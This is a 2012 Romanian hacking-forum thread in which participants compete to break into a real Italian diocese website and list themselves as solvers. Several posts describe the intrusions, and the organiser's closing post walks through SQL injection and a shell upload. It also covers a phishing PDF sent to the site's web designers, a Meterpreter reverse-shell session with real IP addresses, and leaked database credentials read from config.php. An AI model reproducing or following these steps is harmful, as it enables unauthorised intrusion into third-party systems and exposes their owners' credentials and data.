neo.hapsis Posted October 18, 2012 Report Posted October 18, 2012 (edited) [+] Target : Diocesi di Pozzuoli[+] Method : No matter (sql injection,ftp,ssh bruter,metasploit handling)[+] Requierements : Attack the website (no matter how) or attack to their host (metasploit,ftp,ssh etc) and put your name in the list who was here.And refresh the new linkProof|Challenge put your name on list|SOLVERS 1. Wubi 2. Co4ie 3. Zykraxx 4. ps-axl 5. oul 6. K01N 7. DaNNy.BVGoodluck! Edited October 22, 2012 by neo.hapsis Quote
Robert1995 Posted October 18, 2012 Report Posted October 18, 2012 Doar o intrebare, ce legatura au credit cardurile cu pagina aceea ? <script language="JavaScript" type="text/javascript" id="wrc-script-middle_window"> var g_inputsCnt = 0; var g_InputThis = new Array(null, null, null, null); var g_alerted = false; /* we test the input if it includes 4 digits (input is a part of 4 inputs for filling the credit-card number)*/function is4DigitsCardNumber(val){ var regExp = new RegExp('[0-9]'); return (val.length == 4 && val.search(regExp) == 0); }/* testing the whole credit-card number 19 digits devided by three '-' symbols or exactly 16 digits without any dividers*/function isCreditCardNumber(val){ if(val.length == 19) { var regExp = new RegExp('[0-9]-[0-9]-[0-9]-[0-9]'); return (val.search(regExp) == 0); } else if(val.length == 16) { var regExp = new RegExp('[0-9][0-9][0-9][0-9]'); return (val.search(regExp) == 0); } return false; }function CheckInputOnCreditNumber(self){ if(g_alerted) return false; var value = self.value; if(self.type == 'text') { if(is4DigitsCardNumber(value)) { var cont = true; for(i = 0; i < g_inputsCnt; i++) if(g_InputThis[i] == self) cont = false; if(cont && g_inputsCnt < 4) { g_InputThis[g_inputsCnt] = self; g_inputsCnt++; } } g_alerted = (g_inputsCnt == 4); if(g_alerted) g_inputsCnt = 0; else g_alerted = isCreditCardNumber(value); } return g_alerted;}function CheckInputOnPassword(self){ if(g_alerted) return false; var value = self.value; if(self.type == 'password') { g_alerted = (value.length > 0); } return g_alerted;}function onInputBlur(self, bRatingOk, bFishingSite){ var bCreditNumber = CheckInputOnCreditNumber(self); var bPassword = CheckInputOnPassword(self); if((!bRatingOk || bFishingSite == 1) && (bCreditNumber || bPassword) ) { var warnDiv = document.getElementById("wrcinputdiv"); if(warnDiv) { /* show the warning div in the middle of the screen */ warnDiv.style.left = "0px"; warnDiv.style.top = "0px"; warnDiv.style.width = "100%"; warnDiv.style.height = "100%"; document.getElementById("wrc_warn_fs").style.display = 'none'; document.getElementById("wrc_warn_cn").style.display = 'none'; if(bFishingSite) document.getElementById("wrc_warn_fs").style.display = 'block'; else document.getElementById("wrc_warn_cn").style.display = 'block'; warnDiv.style.display = 'block'; } }} </script> Quote
neo.hapsis Posted October 18, 2012 Author Report Posted October 18, 2012 Dracu stie robert nu mai uitat la continutul total al sursei.Repede le am luat un index si le am modificat citeva randuri care sa refere la challenge! Quote
oul Posted October 19, 2012 Report Posted October 19, 2012 Nimic nu mai merge dupa wubi:))) ADODB.Connection error '800a0e78'L'operazione non è consentita se l'oggetto è chiuso./index.asp, line 478 Quote
neo.hapsis Posted October 19, 2012 Author Report Posted October 19, 2012 (edited) Mc Wubi ... stii pt ce ...Ti-a dat hint sau te-ai folosit de acel "lucru" ce le-a pus el sus??Oricum bravo! Edited October 19, 2012 by neo.hapsis Quote
co4ie Posted October 20, 2012 Report Posted October 20, 2012 M-am folosit de ceva...mi-a facut viata "mai usoara" ... Quote
daNNy.bv Posted October 20, 2012 Report Posted October 20, 2012 co4ie? poti da si mie un pm cu hintu'? am reusit sa obtin acces pe admin prin sqli, m-am adaugat in lista, dar nu gasesc pagina respectiva /logfilestorage/index.html ca sa modifica sursa Quote
daNNy.bv Posted October 20, 2012 Report Posted October 20, 2012 nu ma mai pot loga la italieni. voua va mai merge loginu de la admin din sqli? Quote
oul Posted October 20, 2012 Report Posted October 20, 2012 Done (putinel ajutor de la wubi)|Challenge put your name on list| Quote
neo.hapsis Posted October 22, 2012 Author Report Posted October 22, 2012 Challeng-ul sa terminat! Solvers: 7Views: 1,084Cred ca multi ati reusit challengul cu atacu:sql injection urmand pasi:1.Aflarea parola de admin 2.Logare in area de admnistrare3.Modificare vreunui script sau fisierul php cu uplodarea unui shell4.Navigare la directorul respectiv si includere nickul in fiserul index.htmlEu personal m-am folosit atacarea webdesignerilor sai cu metoda : Client Side attack pdf file infection.1.Trimiterea unei e-mail la adresa webdesignerilor cu un fisier pdf infectat2.Folosind si windows/shell/reverse_tcp [sa nu le confundam cu windows/shell_reverse_tcp][*] Starting the payload handler...[*] Sending stage (718336 bytes)session[*] Meterpreter session 1 opened (192.168.1.120:455 -> 89.31.72.209:49322)3.Citirea fisierului de configurare ptr a intra in baza de datecat config.php"HOST" => "mysql512.sqlhosting.it","NAME" => "infobacoli_it_wp","USER" => "roilin43_wp","PASSWD" => "infowp"4 Intrarea in baza de date si crearea unei tabel tmp(codetab txt)5.Inserarea valori a unei fisier php uploader in tabelul tmp6.Folosirea INTO OUTFILE .... from tmp7.Navigarea la locatia fisierului uplodat si cerere info ptr user si passDe la punctul 3-6 am facut din pura curozitate si plictiseala ,puteam sa uplodez direct din metasploitVa multumesc tuturor competitorilor care au participat la challenge!Sunt curios cei care le-au rezolvat cum le a putut rezolva...sunt curios si la rezolvarea lui DaNNY.BV Quote
daNNy.bv Posted October 22, 2012 Report Posted October 22, 2012 Sqli ( cu morcovu' ca n-am acut timp) login, shell, modificare sursa la indeu ala Quote
co4ie Posted October 26, 2012 Report Posted October 26, 2012 sqli manual ... shell-ul lui Wubi ... done in unde 3 min !! Quote